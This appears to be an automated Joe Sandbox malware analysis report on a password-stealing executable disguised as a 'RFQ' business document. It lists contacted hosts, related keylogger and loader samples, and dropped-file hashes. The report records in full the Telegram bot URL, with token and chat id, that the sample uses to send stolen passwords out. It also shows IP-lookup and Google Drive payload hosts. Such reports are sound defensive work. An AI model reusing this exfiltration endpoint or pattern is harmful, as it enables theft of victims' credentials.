                            https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comRFQ December-January Forcast and TCL.exe, 00000004.00000003.2144920207.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144844761.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.orgRFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034483000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000343E1000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034274000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000342C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botRFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://drive.usercontent.google.com/PWRFQ December-January Forcast and TCL.exe, 00000004.00000002.2972173714.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2198316718.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://translate.google.com/translate_a/element.jsRFQ December-January Forcast and TCL.exe, 00000004.00000003.2144920207.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144844761.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.google.com/RFQ December-January Forcast and TCL.exe, 00000004.00000002.2972173714.0000000003B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000342C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://drive.google.com/rRFQ December-January Forcast and TCL.exe, 00000004.00000002.2972173714.0000000003B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://reallyfreegeoip.orgRFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034108000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://reallyfreegeoip.orgRFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000340F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.usercontent.google.com/RFQ December-January Forcast and TCL.exe, 00000004.00000002.2972173714.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2198316718.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.orgRFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034483000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000340DD000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000340F0000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000343E1000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034274000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000342C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://apis.google.comRFQ December-January Forcast and TCL.exe, 00000004.00000003.2144920207.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000003.2144844761.0000000003BE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.comRFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034483000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000340F0000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000343E1000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034274000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000342C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nsis.sf.net/NSIS_ErrorErrorRFQ December-January Forcast and TCL.exefalse
                                                            high
                                                            http://api.telegram.orgRFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034483000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.000000003419A000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000343E1000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034274000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000342C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://reallyfreegeoip.org/xml/RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.00000000340F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  149.154.167.220
                                                                  api.telegram.orgUnited Kingdom
                                                                  62041TELEGRAMRUfalse
                                                                  172.217.17.46
                                                                  drive.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  172.217.17.65
                                                                  drive.usercontent.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  158.101.44.242
                                                                  checkip.dyndns.comUnited States
                                                                  31898ORACLE-BMC-31898USfalse
                                                                  172.67.177.134
                                                                  reallyfreegeoip.orgUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1577232
                                                                  Start date and time:2024-12-18 09:50:07 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 6m 51s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:6
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:RFQ December-January Forcast and TCL.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 96%
                                                                  • Number of executed functions: 157
                                                                  • Number of non-executed functions: 114
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  TimeTypeDescription
                                                                  03:52:02API Interceptor120502x Sleep call for process: RFQ December-January Forcast and TCL.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  149.154.167.220FileScanner.exeGet hashmaliciousUnknownBrowse
                                                                    PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      stealer.jarGet hashmaliciousCan StealerBrowse
                                                                        stealer.jarGet hashmaliciousCan StealerBrowse
                                                                          zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                            zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                              ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      158.101.44.242TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      checkip.dyndns.comInvoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.8.169
                                                                                      ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 193.122.130.0
                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 158.101.44.242
                                                                                      pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      api.telegram.orgFileScanner.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                      • 149.154.167.220
                                                                                      zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                      • 149.154.167.220
                                                                                      ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      reallyfreegeoip.orgInvoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 104.21.67.152
                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.67.152
                                                                                      MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.67.152
                                                                                      pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.67.152
                                                                                      hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.67.152
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      TELEGRAMRUFileScanner.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                      • 149.154.167.220
                                                                                      zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                      • 149.154.167.220
                                                                                      Setup.msiGet hashmaliciousVidarBrowse
                                                                                      • 149.154.167.99
                                                                                      ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      ORACLE-BMC-31898USx86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 192.29.189.21
                                                                                      Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                      • 147.154.227.181
                                                                                      87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 193.122.130.0
                                                                                      https://machino.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                      • 152.67.3.57
                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 158.101.44.242
                                                                                      MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 158.101.44.242
                                                                                      pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      CLOUDFLARENETUSardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.157.254
                                                                                      sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                      • 172.65.251.78
                                                                                      jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                      • 172.65.251.78
                                                                                      Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                      • 172.65.251.78
                                                                                      YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.16.124.96
                                                                                      http://efaktura.dhlecommerce.plGet hashmaliciousUnknownBrowse
                                                                                      • 104.18.86.42
                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                      • 104.21.23.76
                                                                                      https://t.ly/2PGC5Get hashmaliciousUnknownBrowse
                                                                                      • 104.20.7.133
                                                                                      x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 104.29.213.135
                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                      • 104.21.2.110
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      54328bd36c14bd82ddaa0c04b25ed9adInvoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                      • 172.67.177.134
                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 172.67.177.134
                                                                                      pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 172.67.177.134
                                                                                      3b5074b1b5d032e5620f69f9f700ff0ex0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                      • 149.154.167.220
                                                                                      jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                      • 149.154.167.220
                                                                                      Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                      • 149.154.167.220
                                                                                      x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      twjMb9cX64.exeGet hashmaliciousSliverBrowse
                                                                                      • 149.154.167.220
                                                                                      WOlxr4yjgF.exeGet hashmaliciousSliverBrowse
                                                                                      • 149.154.167.220
                                                                                      credit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                      • 149.154.167.220
                                                                                      PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                      • 149.154.167.220
                                                                                      37f463bf4616ecd445d4a1937da06e19duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 172.217.17.65
                                                                                      • 172.217.17.46
                                                                                      5j0fix05fy.jsGet hashmaliciousNetSupport RATBrowse
                                                                                      • 172.217.17.65
                                                                                      • 172.217.17.46
                                                                                      Setup.msiGet hashmaliciousVidarBrowse
                                                                                      • 172.217.17.65
                                                                                      • 172.217.17.46
                                                                                      htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                                      • 172.217.17.65
                                                                                      • 172.217.17.46
                                                                                      67618a47ee8c5.vbsGet hashmaliciousMint StealerBrowse
                                                                                      • 172.217.17.65
                                                                                      • 172.217.17.46
                                                                                      PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                                                      • 172.217.17.65
                                                                                      • 172.217.17.46
                                                                                      BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                      • 172.217.17.65
                                                                                      • 172.217.17.46
                                                                                      ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 172.217.17.65
                                                                                      • 172.217.17.46
                                                                                      87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 172.217.17.65
                                                                                      • 172.217.17.46
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      C:\Users\user\AppData\Local\Temp\nskEAE7.tmp\System.dllPAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                O0rhQM49FL.exeGet hashmaliciousUnknownBrowse
                                                                                                  O0rhQM49FL.exeGet hashmaliciousGuLoaderBrowse
                                                                                                    5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                      5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                        K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          Process:C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):296773
                                                                                                          Entropy (8bit):7.7553240459150565
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:l2Zvnfa6iZq6R5dP+Zsgwuh95zJGwThReXR7gh6cfT7yM0ox:aTiU6R5JEsw9BowNReXR7gtHDx
                                                                                                          MD5:BF152442F1F99452926CD94369F6B608
                                                                                                          SHA1:72CFE2D2596E73BDE8CA89350B9B0598C1BC6931
                                                                                                          SHA-256:B1197715B329AD2AD85AD8B21648E20C05EA63DBC3E946DC84EB3B49D9D94975
                                                                                                          SHA-512:5CD5BBB7941ED267AE792AC28772073112F99BBC704F7931895ACA30BC827D0E16BDE4B406EC2805A3F7F2A3857D1B6170CBF946858A217F515484AE519EAE8F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.....................>>>>....................?............77777777.<..d........................A....!!.CC........33...........Y.....aaaaaaa......3.......JJ.ff.......BBBB..F...^.8.....................GGG../.v........................M.'..RR.....t........W..GG.???._____..........Y...........q..............Y.................KK...............??........U.........l.P.........%%..................22.RRRRR..........\..._...........VVV.QQQ.M................EE.j..111.....xx.RRR...................................d...............$.q................;....................//........<...^^^...........=........w....yy.P...s.!.Q..\.*.....555..........rrrr....zz.........................................RRR...........O...^^^.......iii............0...,.NN.........d.e.........C.....y.|||.LL........m.....55..................................... ..zz.......==................p..LL.)....JJJ.........6...................dd..***..h..........((...I..................i........BBBB...W..s...<.QQ.....LLL.....h.**..........
                                                                                                          Process:C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):56641
                                                                                                          Entropy (8bit):1.2318917163845036
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
                                                                                                          MD5:39C9A5F767D8C170B5CE38EA8D5734D4
                                                                                                          SHA1:4B4CA81EB3D093645B504004F62A269D4EACDECC
                                                                                                          SHA-256:87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
                                                                                                          SHA-512:AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.............l.........z........i........8.........................m.........f.C.Z..............I./........T..1.......................!......................D.................................................................................U................................../........................................-.......................}.........T`.....0@.............................F..............................].........................L.........<.........................................................................................N......................................................x........................................................@............................................4..........'...................?..........I.............../....................L....,...............................................;......k.....................................i............4.......................................K.....7...7....c...................U..#..............................
                                                                                                          Process:C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):137129
                                                                                                          Entropy (8bit):4.597202404090859
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:NppsEOCAUuOh8DuTKHFGWDpdrxDA60gWyYvquxtWGhTqbmIDaQyjhbIpbGtEz3rn:65hjDph1A6ia6UgTkmIDOeIEHn
                                                                                                          MD5:786741C59B9C7924CDD5560A739C93FF
                                                                                                          SHA1:C10560B3BD57FB16D5B91D7BF4A31DC92ABA9BB7
                                                                                                          SHA-256:D90ECEC37B6F392863FC12EC9A2248E71B6E8B3C7368A3DDAAA3E85D9BF7464D
                                                                                                          SHA-512:65D1EDA5677F7142E8D0B3EC8F0FD0040FDC29B2D4311CA8AA971FEC653BCCF1C13B57DB492D259F33A0D65115CA2C2CCFA2680381E20A9FE325AFCE6AE2B469
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.........444.;......;;...................jj..........TTT.7.....................................................WWW....s...kkk........%%........?.........................................".....OOO.....@..........t.......---.......:.0....................................{....8.N................ww..........CC.............................kkkk..........))...d....P........}......................X..............ZZ....S......(...............yy.[[[[.......@..5.......))................DD.................FF..CC.......Y.................h.ssssss........XXX.........P..6..............t..........................v..............ll........................"....9...........mm......C....}......M...PP....XXX.....................LLL...................jj..........................................&&..tt............G...&&..............IIIIIIIIII...............>>>>.n....z..........!!.7...........##.YYY............11.{...l........''''.............ooo.....>>..0000.^.......................b............-..@@......888888.
                                                                                                          Process:C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          File Type:ASCII text, with very long lines (345), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):345
                                                                                                          Entropy (8bit):4.241929841155785
                                                                                                          Encrypted:false
